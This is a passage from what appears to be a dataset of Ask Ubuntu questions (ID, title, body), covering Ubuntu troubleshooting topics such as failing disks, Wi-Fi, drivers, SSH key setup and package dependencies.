down menu did not appear . next i try to login , but it says wrong password . i am 100 % sure that the password is correct . how i get out it 's an example situation , but every situation leads me to a dead end , where i finally simply push the power button of laptop to force it to switch off . i feel that it 's bad , but it 's the only out of this situation . some history i was using windows 8 before . i switched to ubuntu cause i was facing a weird problem there . suddenly one day , out of blue , my hard disk usage started to spike to 100 % . the laptop would get laggy and unusable . i switched to ubuntu fearing some os problem . but now even in ubuntu i am facing a different weird problem . at least , here it wo n't get laggy . how i use my laptop i keep my laptop switched on for really long time every day . i will start my laptop the moment i wake up and continue to use it until i sleep . so that 's around 12-16 hours . i tend to use firefox for internet , codeblocks for programming and rythmbox for music . that 's it . my doubts is it my hard disk ? is it getting too old or something ? or perhaps it 's overheating . i do n't use a cooler . is it time to get a new laptop ? i want to avoid buying a new one . updates thanks for the replies . i am trying to do what you guys have instructed . it is tough doing it while the laptop keeps on getting stuck . i managed to get few more data . i will keep on updating as i collect them . i tried sudo shutdown now in the `` hanged '' state . it said `` permission denied : can not access /var/lib/sudo/10 . i installed iotop . when i ran it during `` hanged '' state , it showed 0 write and read speed . i am on process of doing smart scan . but i noticed my hard disk temperature 45c/113f . that seems high . when i went to `` disks '' and into my hard disk , it showed 593 bad sectors . is that bad ? i try to create a file using `` touch '' it says `` read only file system '' . ca n't use `` mv '' either . apt-get ca n't install anything either . suppose there is folder called pictures . if i write `` cd pictures '' , it works . but if i write `` cd pic '' and press tab to auto fill the name , the terminal closes .
518331	use same swap on two ubuntus with home encryption	i have 2 14.04 in dual boot , both with home encryption . i would like them to use the same swap partition . one has a working swap partition ( /dev/mapper/cryptswap1 ) , but the other does n't pick up the available swap . how can i change that ?
518333	adding new right click options without using nautilus-actions configuration tool	how to create an extra option in the right click context menu without using nautuilus-actions ? i wish to create an option to hide/unhide desktop icons by that option . i have made two shell scripts to hide and unhide icons . now , i need to create right click options and map it to my scripts . please help me to achieve that . i wish to do that without using the nautilus-actions configuration tool . . .
518335	how to call just a function from text script	i have a text file with a lot of functions in it . for example : # fisrt function # runs update and upgrade function upug ( ) { sudo apt-get update & & sudo apt-get upgrade } # second function # find out the processes running that use the most memory function memusage ( ) { ps aux | sort -nrk 4 | head } # third function # install package function ipkg ( ) { sudo apt-get install } [ ... ] now i want to able use these functions as the similar something as follows in terminal : with running upug in terminal calls function upug ( ) user @ test-pc : ~ $ upug with running memusage in terminal calls function memusage ( ) user @ test-pc : ~ $ memusage with unning ipkg package_name calls function ipkg ( ) user @ test-pc : ~ $ ipkg package_name i created an alias for each of these commands . now question is how can i call these function with alias name of that ?
518341	no root file system	i have almost the same problem with the link below . `` no root file system defined '' error while installing ubuntu in my part , i had a problem with my drive about bitlocker key . i didnt have a chance to save the key then unfortuantely something happened in my laptop . so now i decided to change my os from windows 7 to ubuntu 14.04.1 . while in the installing process `` no root file system '' window popped out , but the my situation is , i think ubuntu does n't read my hdd . here are the screen pictures ,
518342	which version of ubuntu can i install inside windows in my windows 8.1 preinstalled laptop	i have a laptop with preinstalled windows 8.1 in it . i want to install ubuntu inside windows , because i dont want to lose my genuine copy of windows . i read i cant install ubuntu 14.04 in a windows 8.1 preinstalled system . then is there any older ( not much older ) version of ubuntu which i can install for my purpose ?
518344	zero network traffic and no wake on lan with qualcomm atheros qca8171 gigabit ethernet	up until recently , i was using ubuntu 12.04 . my qualcomm atheros qca8171 gigabit ethernet network card seemed to be working fine : network traffic and wake on lan both worked . i just installed ubuntu 14.04 and the network traffic only shows zero activity . also , i can not seem to wake up my computer remotely via my modem anymore , using wake on lan . both ifstat -a and the system monitor show zero activity . with sudo lshw , i get for the network *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : bc:5f : f4 : c9 : e9 : c6 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=full ip=192.168.178.2 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:46 memory : f0400000-f043ffff ioport : e000 ( size=128 ) . furthermore , modinfo alx returns filename : /lib/modules/3.13.0-35-generic/kernel/drivers/net/ethernet/atheros/alx/alx.ko license : gpl description : qualcomm atheros ( r ) ar816x/ar817x pci-e ethernet network driver author : qualcomm corporation , < nic-devel @ qualcomm.com > author : johannes berg < johannes @ sipsolutions.net > srcversion : 15100f26458c5b941f93ebf alias : pci : v00001969d000010a0sv*sd*bc*sc*i* alias : pci : v00001969d000010a1sv*sd*bc*sc*i* alias : pci : v00001969d00001090sv*sd*bc*sc*i* alias : pci : v00001969d0000e091sv*sd*bc*sc*i* alias : pci : v00001969d00001091sv*sd*bc*sc*i* depends : mdio intree : y vermagic : 3.13.0-35-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : b1:41:4a : e9:6c:1b:0e : bb:7c:14:1f : a4:05 : c1 : f6 : c9:8e:8a:66 : f0 sig_hashalgo : sha512 . i am aware that this question resembles network traffic reports as zero bytes in a way , but there have not been any updates there for two months now . how can i fix the network traffic and wake on lan ?
518345	rebooting into old windows	whenever i try to install ubuntu 14.04 x86 , on pc - after selecting an option from the menu like install ubuntu it restarts into windows 8 on laptop - after selecting an option from the menu it takes me either to a black world or show squares full of colors and my laptop does not have any other os . help me get out of this please ! edit , more info : i want to install ubuntu on my laptop - acer aspire one model no . is 722 `` not sure `` windows 8 , i have first download it from the web and then i made my usb bootable by pendrivelinux and after booting i pressed f12 to get into the boot menu , and selected my usb drive and then pressed back arrow key and it showed me language and i pressed enter at english and then i tapped enter at install linux and it showed some error window which was having squares of different colors i ca n't explain that page .
518351	help me , how to mount this partiotion	error mounting /dev/sda1 at /media/itsaj3/d25cdad95cdab785 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/itsaj3/d25cdad95cdab785 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
518352	.bashrc is not compiling in ubuntu	i installed new hard disk in the existing ubuntu system and i added the new user using sudo useradd -m naresh then i logged into user account and it showed everything in $ ( dollar ) sign and the shell built-ins are not working . even i am not able to compile the .bashrc file using source or .. $ . ~/.bashrc /home5/naresh/.bashrc : 13 : shopt : not found /home5/naresh/.bashrc : 21 : shopt : not found /home5/naresh/.bashrc : 99 : shopt : not found /etc/bash_completion : 33 : [ [ : not found /etc/bash_completion : 39 : [ [ : not found /etc/bash_completion : 52 : bad substitution \ [ \e ] 0 ; \u @ \h : \w\a\ ] \u @ \h : \w $ then i logged in su and i executed sudo chsh -s /bin/bash naresh this changes the user entry in /etc/passwd from ( /bin/sh to /bin/bash ) but it has no effect on the working shell please provide me the solution
518356	how to get terminal access to iso mounted with archive mounter ?	when i mount a .iso image with archive mounter using nautilus , i get a new entry under network . i can use this in nautilus but can not find a way to cd to it from a terminal . i tried installing nautilus-open-terminal but it wo n't work for directories mounted in this way ! note , there are already solutions on askubuntu using the terminal to create a loopback device . i do n't want to do this and am only interested in a way i can mount with archive mounter and then access with a terminal .
518358	android virtual device is not starting	i am facing a problem to run the avd in my xubuntu 14.04 64bit version . before that i used xubuntu 32bit and that time my adt ( 32bit ) worked . but now i am using 64bit adt and 64bit os . everything is okay but the avd is not starting and showing me the problem below : starting emulator for avd 'avd_name' failed to start emulator : can not run program `` /media/disk_name/folder_name/and_dev/adt-bundle-linux-x86_64-20140321/sdk//tools/emulator '' : error=2 , no such file or directory please help me ... .. thanks in advance .
518359	error while updating apps in ubuntu touch	i 'm trying to update my ubuntu touch apps from both phone and phablet-shell . when i tried it from phone , here is the error shows . also tried by adding there ppa ppa : phablet-team/ppa ppa : ubuntu-touch-coreapps-drivers/daily and running sudo apt-get update sudo apt-get upgrade also tried sudo apt-get dist-upgrade all commands executed well . still the apps are not updated . any other methord to update my apps ?
518360	writing a bash script to execute/automate install of drivers	i 'm trying to write a script to automate the install of tv card drivers ( for some reason i have to re-install after each ubuntu update ) . would this work ? i 've tried it but it does n't look like it 's doing anything ... .. # / ! bin/bash # script to reinstall tv card drivers ... function install ( ) { wget http : //www.tbsdtv.com/download/document/common/tbs-linux-drivers_v140707.zip mkdir driver mv tbs-linux-drivers_v140707.zip ./driver/ cd driver/ tar xjvf linux-tbs-drivers.tar.bz2 cd linux-tbs-drivers/ ./v4l/tbs-x86_r3.sh sudo make sudo make install shutdown -r now }
518363	asus_nb_wmi - wifi and mobile brandband	i have asus x550v and i have problem with ubuntu 14.04 . when set to asus_nb_wmi : 0 - wifi not working but mobile brandband working . 1 - wifi working but mobile brandband not working . 4 - wifi working but mobile brandband not working . how i must set it ? where is problem ?
518364	ubuntu unity 14.04 built-in display ca n't be turned off	my resolution is messed up , but the built-in display can not be turned off and i can not adjust it , in fact not even get to see all settings below . i checked if my sis video card driver is properly installed , but that seems to be the case . there is no problem with a second monitor or anything , which seems to be a known bug . i have browsed the forum , but i can not find how i can fix it . do i maybe need to create a xorg.conf file ?
518365	virtual machine manager kvm is not available - ubuntu 12.04	im a bit new to ubuntu i installed kvm using these commands : 1.sudo egrep ' ( vmx|svm ) ' -- color=always /proc/cpuinfo output was produced like 4 times 2.sudo apt-get install kvm ubuntu-vm-builder libvirt-bin bridge-utils 3.sudo reboot -h now 4.virsh -- connect qemu : ///system list -- all saw this id name state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 5.sudo adduser yourusernamehere libvirtd already was added 6.sudo adduser yourusernamehere kvm 7.sudo reboot -h now now when i open virtual machine manager and click on the create a new virtual machine , there is a warning saying : kvm is not available . this may mean the kvm package is not installed or the kvm kernel modules are not loaded . yout virtual machines may perform poorly . i have ubuntu 12.04 and sony vaio e series vpcea35fg , core i3-370m 2.4ghz 4gb of ram
518369	how to install vundle on gvim in ubuntu 14.04 64bit ?	i want to install vundle + youcompleteme autocomplete plugin in gvim on ubuntu 14.04 . how can i accomplish my task ?
518370	extract several zip files , each in a new folder with the same name , via ubuntu terminal	i have many zip files a.zip , b.zip , c.zip , ... and i want to extract each of them into new folders a , b , c , ... respectively , via ubuntu terminal . actually , what i want is a solution that i can use later with a find because i actually have many folders 2014 , 2013 , 2012 , ... each of them containing many zip files a.zip , b.zip , etc . if i do find . -name `` *.zip '' -exec { } unzip \ ; it will unzip all the files and put them into their respective parent folder .
518371	ubuntu 12.04 admin password account disabled	i have ubuntu lts 12.04 i wanted to make a new administrator ... ..i created a new user..made it admin and made the earlier user standard ... .but accidentally the new admin user password says `` account disabled '' ... now i can only log in with earlier user ( standard ) and not with admin ... ... i tried recovery mode in the recovery mode it asks for `` root password for maintenance '' ... which i do n't know ... . also if i try to solve using terminal in earlier user it says `` user not in sudoers file.this incident will be reported '' ... ... ... .. how can i access the admin account or create a new one ... ... help
518372	have to restar pc tu connect wifi	i have this problem , i 'm using ubuntu , when i 'm watching youtube suddenly it disconnects and when i go to check the wifi reds avaiable it does n't show anything , somestimes it appears my wifi but ca n't connect . so i restart my laptop and it works again , but i have to this every three house : ( help me please : ) thanks
518374	what is the media-key command in 14.04 for sound and brightness ?	i am using a laptop and with vanilla ubuntu 14.04 i was able to control my monitor brightness with super+f5/f6 . now i want to switch to i3wm and i need to manually bind those keys . what is the command to control the brightness/sound etc ?
518375	14.04 lts intermittently fails to resume from hibernation	since upgrading to 14.04 lts ( 64-bit ) , my pc will sometimes fail to resume from hibernation ( perhaps one time in ten ) . symptoms are that it attempts to resume , finds the suspended memory image , and shows the percentage of the image loaded ( 10 % , 20 % , etc . ) it reaches 100 % and then the pc reboots back to the bios splash screen . when the grub menu reappears , it does not have the usual timeout . i do n't know what to try to isolate the cause . hibernation worked reliably on the same hardware under 12.04 lts .
518377	14.04 lts ca n't suspend anymore	i changed the `` what to do when laptop 's screen is closed '' option under power last night . it was at suspend and i switched it to do nothing . the problem is , i ca n't get it back to suspend anymore ! help ! what info do you need ? i 'm on a thinkpad x201 .
518378	no privacy options in ubuntu gnome	running ubuntu gnome 14.04 updated till date . in system settings , there is no 'privacy ' settings option . in the help for system settings , it does mention 'privacy ' settings ( like what appears on the lock screen , etc . ) am i missing something ? how do i get the privacy options ?
518379	dependencies | not able to install from ubuntu software center | ubuntu 14.04	i am not able to download and install programs ( including vlc and unity tweak tool ) from the ubuntu software center . every time i try to get them , there is a dependency error and i am completely lost now . i am using ubuntu 14.04 ( 64bit ) . more details : **package dependencies can not be resolved** this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but 2.1.4-0ubuntu14.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6.3 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.5.2-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libsdl1.2debian ( > = 1.2.11 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.3.0~ ) but it is not going to be installed depends : libva1 ( > 1.3.0~ ) but it is not going to be installed depends : libxcb-composite0 but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.9 ) but it is not going to be installed depends : libxcb-xv0 ( > = 1.2 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed results of commands requested : sudo apt-get update & sudo apt-get upgrade & sudo apt-get install -f result : http : //imgur.com/qm4mpbd,6iek7ii , u3fkb8j , pxmu2fd , jslxc7g sudo apt-get update & & sudo dpkg-reconfigure -a & & sudo apt-get -f install -y result : http : //imgur.com/ar0tqor , scfa41p , gavtxnj , vuescrg , gtl4hdq
518383	networkmanager [ 920 ] : < warn > connection disconnected ( reason -4 )	using 14.04 on a thinkpad x1 carbon , a wifi which works fine on other laptops regularly disconnects `` by itself '' , and only comes back on after a forced disable/re-enable wifi . in /var/log/syslog i 've , among other things , noticed this : networkmanager [ 920 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating networkmanager [ 920 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated networkmanager [ 920 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake wpa_supplicant [ 1343 ] : wlan0 : wpa : key negotiation completed with a4:52:6f:8e : ff:01 [ ptk=ccmp gtk=tkip ] wpa_supplicant [ 1343 ] : wlan0 : ctrl-event-connected - connection to a4:52:6f:8e : ff:01 completed [ id=0 id_str= ] networkmanager [ 920 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed wpa_supplicant [ 1343 ] : wlan0 : ctrl-event-disconnected bssid=a4:52:6f:8e : ff:01 reason=4 locally_generated=1 networkmanager [ 920 ] : < warn > connection disconnected ( reason -4 ) what does mean , and ( more importantly ; - ) how can this be fixed ? i 'd be happy to update the q with more information if you respond to the q with what 's needed .
518386	how to assign one x screen to one lightdm seat ?	i 'm trying to configure a multiseat setup on a desktop pc with two keyboards two mice two monitors attached to the same graphics card ( nvidia nvs 310 ) using these instructions i managed to make lightdm start two seats and udev will exclusively assign the same mouse and keyboard to the same seat every time . problem : udev could assign a graphics card exclusively to one seat , but there 's only one card . udev ( i think ) can not assign one monitor to one seat . wish : i 'd like to solve this without buying a second graphics card , as this affects a lot of pcs in my pool . idea : xorg.conf allows to configure separate x screens for every monitor ( see e.g . nvidia 's manual ) . as far as i understand , every x screen get 's it 's own x server . now is it possible to assign an x screen exclusively to one lightdm seat ?
518387	a question about admin password	i am updating ubuntu 14.04 then machine is restart then after currect username and password not login successfully.what can i do ? ? ?
518388	14.04 - network manager takes too much time reconnecting after resume/wake	i have an intel wireless network card in my notebook . whenever i resume/wake/unhibernate my computer it takes about a minute or so in order to be able to connect to the internet again . it 's just too much ! i know it is n't hardware issue , as i have windows 8 on the very same machine and it reconnects seamlessly , so the software running has no idea that internet connectivity has been suspended . is it something wrong with how ubuntu handles networking , or is it a problem with my configuration ?
518393	extracting a statically linked library	is it possible to extract a statically linked library from an executable ( e.g . turn it into an .so file ) , when i have the .h header file declaring the symbols ? i also already have the .so file , but it 's in the wrong instruction set . i 'll list the files to make it easier to understand . libfoo32.so ( arm ) foo-executable ( amd64 ) executable that has libfoo64.so ( amd64 ) statically linked main.c c code that includes foo.h and must be linked with libfoo64.so ( amd64 ) foo.h header file for libfoo*.so ( amd64 / arm ) what i want to get out of that : libfoo64.so ( amd64 ) so i can compile main.c my-excecutable ( amd64 ) which is the compiled main.c this is the output of the file command : # file libfoo32.so libfoo32.so : elf 32-bit lsb shared object , arm , eabi5 version 1 ( sysv ) , dynamically linked , stripped # file foo-executable foo-executable : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped note : foo-executable also uses some dynamically linked .sos , but i 'm only interested in the one statically linked libfoo64.so . i am sorry , if i may have used the wrong terminology or asked something with an obvious answer . i 'm pretty new to native coding .
518394	unattended-upgrades error : `` /etc/cron.daily/apt : db update failed , database locked ''	ubuntu 14.04.1 lts since installing unattended-upgrades , the following error message is received daily : from root @ xxxxx thu aug 28 06:36:06 2014 x-original-to : root from : root @ xxxxx ( cron daemon ) to : root @ xxxxx subject : cron < root @ xxxxx > test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) content-type : text/plain ; charset=ansi_x3.4-1968 x-cron-env : < shell=/bin/sh > x-cron-env : < path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin > x-cron-env : < home=/root > x-cron-env : < logname=root > date : thu , 28 aug 2014 06:36:06 -0400 ( edt ) /etc/cron.daily/apt : db update failed , database locked the error message is not received on days where security updates are actually installed and an automatic reboot occurs . what i would like to know please : is this error message a `` real problem '' since security updates appear to be auto-installing as expected . manually running the following commands occurs without error , so why is the ( apt ? ) db locked when run as a cron job ? : unattended-upgrades -d or apt-get update the same/similar issue is asked here but unfortunately with no solution : what can be causing /etc/cron.daily/apt to hang ?
518397	should you use a dvd or usb for a fresh install of ubuntu ?	some specs in relation to my laptop : 8x sata dvdâąr/rw/dual layer ( + 24x cd-rw ) has both usb 3.0 and 2.0 ports . will be installing on a msata ssd with no other os since ubuntu gives you the option of either creating a dvd or usb to use to install ubuntu i am wondering is their any advantage or dis-advantage of using one device over the other when both are present ? main items i 'd be interested in is one less error/fault prone than the other and is it faster to install ubuntu by usb or dvd ?
518399	install 12.04 version of edubuntu	how can i change to edubuntu later version like 12.04 from existing edubuntu 10.04 ? my 10.04 version gives a message that gnome power manager not insatlled correctly.i can not open my ubuntu os . my desktop has windows xp os too . actually my edubuntu was showing an error mssage that gnome power manager not configured..as i tried to reinstall edubuntu from a live cd ( edubuntu 10.04 ) ..it asked me to select an option . i chose .. `` alongside another operating system '' .. after installing when i restarted i can not see grub boot menu..it simply boots into ubuntu . where is my windows xp ? does it get accidentally erased or can i recover it again ?
518400	macbook pro7,1 ubuntu 14.04 external monitor	i have a macbook pro7,1 and i have just installed ubuntu 14.04 . i try to connect it to an external asus monitor , using a mini-display ( thunderbolt ) to hdmi wire . i get an error message saying : '' could not switch the monitor configurations could not set the configurations for critic 586 '' also nothing displays on the monitor and it says `` hdmi : no signal ''
518402	what to do about âthe disk drive for /dev/mapper/cryptswap1 is not ready yet or not presentâ ?	the answer to this question is great , but what do you do when the /etc/crypttab file is empty ? also , gparted does n't see the swap partition and so it wo n't format it . lvm sees the swap partition but all options are greyed out . running ls -l /dev/mapper shows the swap partition but all other commands return a message `` no such file or directory '' . so it seems i 'm at an impasse . ( edited )
518405	migrating from windows to ubuntu	my primary concerns are , 1 . dota 2 ( steam game ) - will i need to reinstall `` steam client and game '' once i change os from win 7 to ubuntu 14.1 ? ( ubuntu supports steam client ) 2 . ms office - will i need to uninstall before i change os ? if yes , what will happen to files ? after changing os , will i be able to open those files in open office or libre office ? 3 . handbrake & vlc - will i need to reinstall them ? ( both support ubuntu ) 4 . gpu - i use asus r7-250 , will i need to reinstall drivers ?
518406	acer aspire v5-431 webcam not working with ubuntu 14.04	i have an acer aspire v5-431 with ubuntu 14.04 ( amd64 ) ( before it has windows 7 home basic x64 ) , and everything works except the webcam . i searched the additional drivers but ubuntu ca n't find it , i tried to update the kernel at the 3.16.1 but the problem continues . what can i do ?
518408	2014 x1 carbon , wifi toggle and clickpad	( ubuntu 14.04 ) i have two questions , so i figured out to put them in one thread . first is about adaptive keyboard , i noticed there is wifi toggle button which seems to do nothing , instead it should turn of wireless ( as i have been told ) . the second one is about clickpad . i know there has been numerous threads about it , but i probably need new one . i used instructions provided in how to install driver for middle button clickpad scrolling this thread by t_send , problem is , the touch is pretty wild . taping left button sometimes reacts sometimes do n't , middle button gets locked itself in scroll mode lots of time etc etc . beside that , acceleration on the trackpoint is pretty slow . also using clickpad fires lots of random clicks . i tried tweaking setting in system settings , but it seems to be ignored . even tap to click can not be turned off . i also tried this http : //code.technically.us/post/50837506478/senistive-touchpads-and-ubuntu tutorial ( alongside with t_send solution ) , but it did nothing . so what i want : functioning trackpoint and clickpad with gestures support and natural scrolling if not then , trackpoint and clickpad if not then , just clickpad . i am trying to find answer here because i know this problem affects all x40 thinkpads having same clickpad , and i suppose somebody here has some solution that works perfectly for them and can provide tutorial how they managed to do it . thanks for any help .
518411	change startup resolution unbutu server	i 'm totally new at unbutu/lynux . i 've installed the server on an old pentium 4 with 1gb of ram . the problem is that the monitor ( samasung led 3d tv through hdmi ) gives the message this resolution is n't supported . so i ca n't see if everything is working . it should work at 800*600 at 32 bit 75 hz . can anyone help me to change the resolution at bootup . for your information , u do n't know how to get to a save mode , edit cfg files and so on . i 've read a lot of the posts on this site , but i ca n't do anything with them . please help me .
518412	how to set the number of steps ( now it 's 5 points for me ) , when audio volume is modified by apple keyboard ( fn f10 , f11 , f12 )	when i use the apple keyboard to increment the audio volume , the steps are n't gradual and fluid but the audio volume , in a 0 to 100 scale , it 's incremented by 5 points at any key pressure and vice-versa . how to change these steps ? ( xubuntu 14.04 ) tnx
518417	setting up ssh - windows to ubuntu	i have the following environment : windows deskside system running w7pro ubuntu 14.04 server running on a cloud server . i have tried multiple ways to set up rsa keys for ssh connections , with no luck . i found hundreds of docs on line describing how to do it , and have tried at least 3 of the methods . no luck . here , basically , is what i do . run puttygen to generate public and private keys . copy the public key from the window . run putty , connect to the system , create a ~/.ssh/authorized_keys file paste the single line public key in it . do the chmods ( chmod 700 .ssh and chmod 600 .ssh/authorized_keys ) edit the /etc/ssh/sshd_config file uncommenting the authorizedkeysfile line restarted ssh run putty , add the private key file , and click open when i try to connect , i get `` server refused our key '' ( an example of the instructions i use is at https : //vorkbaard.nl/using-putty-and-keyfiles-to-ssh-into-your-ubuntu-12-04-server/ ) kind of baffled ... can anyone see what i may have done wrong , or can anyone suggest an approach they used to do this ? the server side is on a hosted service , and i know of no way to get a file to or from it at this time ( no web service set up : no email ) . any help would be appreciated . added sept 1 . found another thread on my exact topic : trying to do ssh authentication with key files : server refused our key this is exactly what i did and can not get it to work .
518418	want to restore to my default dns server settings	i recently tried changing my dns settings and while doing that i altered a few settings due to which i 'm not able to access internet on my wired connection . i tried editing the resolv.conf as follows sudo vi /etc/resolv.conf after few unknown alterations my internet was gone . please help .
518427	how to get my hardware working for kubuntu 14.04 ?	i have a webcam , mic , and printer i want to get working ( if possible ) on kubuntu 14.04 . the webcam is the highest priority for what i want to get working . currently , it works in cheese , but is n't working at all in skype ( the option for a video call is n't even there ) . i 'm using a microsoft lifecam vx-1000 . a snowball ice blue mic and a lexmark 2404939 x2670 all-in-one printer copy/print/scan . any advice for any of these would be welcomed , priority going to the webcam preferably as i used that one the most , it has a mic , and it 's the most important . update : i tried this : ferociousmadman @ ferociousmadman-cm5675 : ~ $ ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype & but got this : [ 1 ] 2962 ferociousmadman @ ferociousmadman-cm5675 : ~ $ error : ld.so : object '/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded ( can not open shared object file ) : ignored . the cam worked for a video call while i had the konsole open , but then stopped when i closed it . it is no longer working now . it 's just gray or trippy rainbow colors appear . my snowball mic works though . i just had to change the order of what the primary mic was in my sound settings . i still need help with my printer/scanner machine as well .
518429	can not unblock wireless hard block with rfkill command	i recently purchased a asus x551ca laptop , which is dual booted with windows 8.1 and ubuntu 14.04 . the wifi works perfectly when running on windows . when booting into ubuntu , my ethernet connects , but wifi does not . checking my network resources shows that the ethernet is enabled but wifi ( wlan0 ) is not . i used the rfkill list command , which identified only blocks associated with wlan0 , with following results : soft blocks=no ; hard block=yes for wlan0 , followed by the rfkill unblock x command ( x= device number , in this case 0 ) , to resolve the hard block for my wifi ( device 0 ) . i toggled the network function to refresh all ethernet/wifi capabilities . using rfkill list command again confirmed that the hard block was not fixed . i repeated this procedure several times with the same results . suggestions to fix this problem by any other methods would be greatly appreciated .
518431	program that simply slows down a network ?	this may seem like an odd question , but i have my reasons . i wanted to ask whether there is a specific program or shell that i can run to just make constant requests to a network which just eats bandwidth ? is this even possible ?
518432	ubuntu iso wo n't burn to blank dvd	i am trying to use ubuntu in virtualbox . i have downloaded it but it does n't burn to a blank dvd . currently using windows xp . any help ?
518434	problem with ubuntu / w8 install and grub	i recently made a mistake when installing ubuntu 14.04 on an external hard drive plugged to a windows 8.1 laptop . my problem is that now if i have the external hard-drive plugged i can choose on which os i want to boot from a grub menu . but if the external hard-drive is n't plugged i have a grub terminal but no menu . is there a way to change that , so when the external hard-drive is n't plugged i can still boot to my w8 install ?
518435	need help finding path to new hdd and changing location of time machine backup ?	hello long story short i just bought a new hdd and need help changing the location of my time machine backup on my ubuntu 14.04 server . you can edit the location of the backup by doing step 2 in this guide http : //ubuntuguide.net/ubuntu-10-10-setting-up-mac-os-time-machine-server this is my first time using ubuntu/linux and i have no idea what the path to my new hdd can somebody please help me by telling me what to input into the applevolumes.default file ? step 2 : configure where to save the time machine backups . here create a target location ( /backup/timemachine for example ) . edit /etc/netatak/applevolumes.default with : sudo gedit /etc/netatak/applevolumes.default type in following : # ~/ “home directory” /backup/timemachine “timemachine” options : tm here backups will be stored in /backup/timemachine . control+l : /media/server/serverhdd applevolumes.default file volume format : : default : [ all of the default options except volume name ] path [ name ] [ casefold : x ] [ options : z , l , j ] \ [ allow : a , @ b , c , d ] [ deny : a , @ b , c , d ] [ dbpath : path ] [ password : p ] \ [ rwlist : a , @ b , c , d ] [ rolist : a , @ b , c , d ] [ limitsize : value in bytes ] \ [ preexec : cmd ] [ root_preexec : cmd ] [ postexec : cmd ] [ root_postexec : cmd ] \ [ allowed_hosts : ipv4 address [ /ipv4 netmask bits ] ] \ [ denied_hosts : ipv4 address [ /ipv4 netmask bits ] ] \ ... more , see below ... name : volume name . it ca n't include the ' : ' character # # variable substitutions : you can use variables for both and now . here are the rules : 1 ) if you specify an unknown variable , it will not get converted . 2 ) if you specify a known variable , but that variable does n't have a value , it will get ignored . # the variables : $ b - > basename of path $ c - > client 's ip or appletalk address $ d - > volume pathname on server $ f - > full name ( whatever 's in the gecos field ) $ g - > group $ h - > hostname $ i - > client ip without tcp port or appletalk network $ s - > server name ( can be the hostname ) $ u - > username ( if guest , it 's whatever user guest is running as ) $ v - > volume name ( either adeid_name or basename of path ) $ z - > zone ( may not exist ) $ $ - > $ # # casefold options [ syntax : casefold : option ] : tolower - > lowercases names in both directions toupper - > uppercases names in both directions xlatelower - > client sees lowercase , server sees uppercase xlateupper - > client sees uppercase , server sees lowercase # allow/deny/rwlist/rolist format [ syntax : allow : user1 , @ group ] : user1 , @ group , user2 - > allows/denies access from listed users/groups rwlist/rolist control whether or not the volume is ro for those users . allowed_hosts - > only listed hosts and networks are allowed , all others are rejected . example : allowed_hosts:10.1.0.0/16,10.2.1.100 denied_hosts - > listed hosts and nets are rejected , all others are allowed . example : denied_hosts : 192.168.100/24,10.1.1.1 preexec - > command to be run when the volume is mounted , ignore for user defined volumes root_preexec - > command to be run as root when the volume is mounted , ignore for user defined volumes postexec - > command to be run when the volume is closed , ignore for user defined volumes root_postexec - > command to be run as root when the volume is closed , ignore for user defined volumes veto - > hide files and directories , where the path matches one of the `` / '' delimited vetoed names . matches are partial , e.g . path is /abc/def/file and veto : /abc/ will hide the file . adouble - > specify the format of the metadata files . default is `` v2 '' . netatalk 1.x used `` v1 '' . `` osx '' can not be treated normally any longer . volsizelimit - > size in mib . useful for timemachine : limits the reported volume size , thus preventing tm from using the whole real disk space for backup . example : `` volsizelimit:1000 '' would limit the reported disk space to 1 gb . # codepage options [ syntax : options : charsetname ] volcharset - > specifies the charset to be used as the volume codepage e.g . `` utf8 '' , `` utf8-mac '' , `` iso-8859-15 '' maccharset - > specifies the charset to be used as the legacy client ( < =mac os 9 ) codepage e.g . `` mac_roman '' , `` mac_cyrillic '' # perm - > default permission value or with the client requested perm use with options : upriv dperm - > default permission value for directories or with the client requested perm use with options : upriv fperm - > default permission value for files or with the client requested perm use with options : upriv umask - 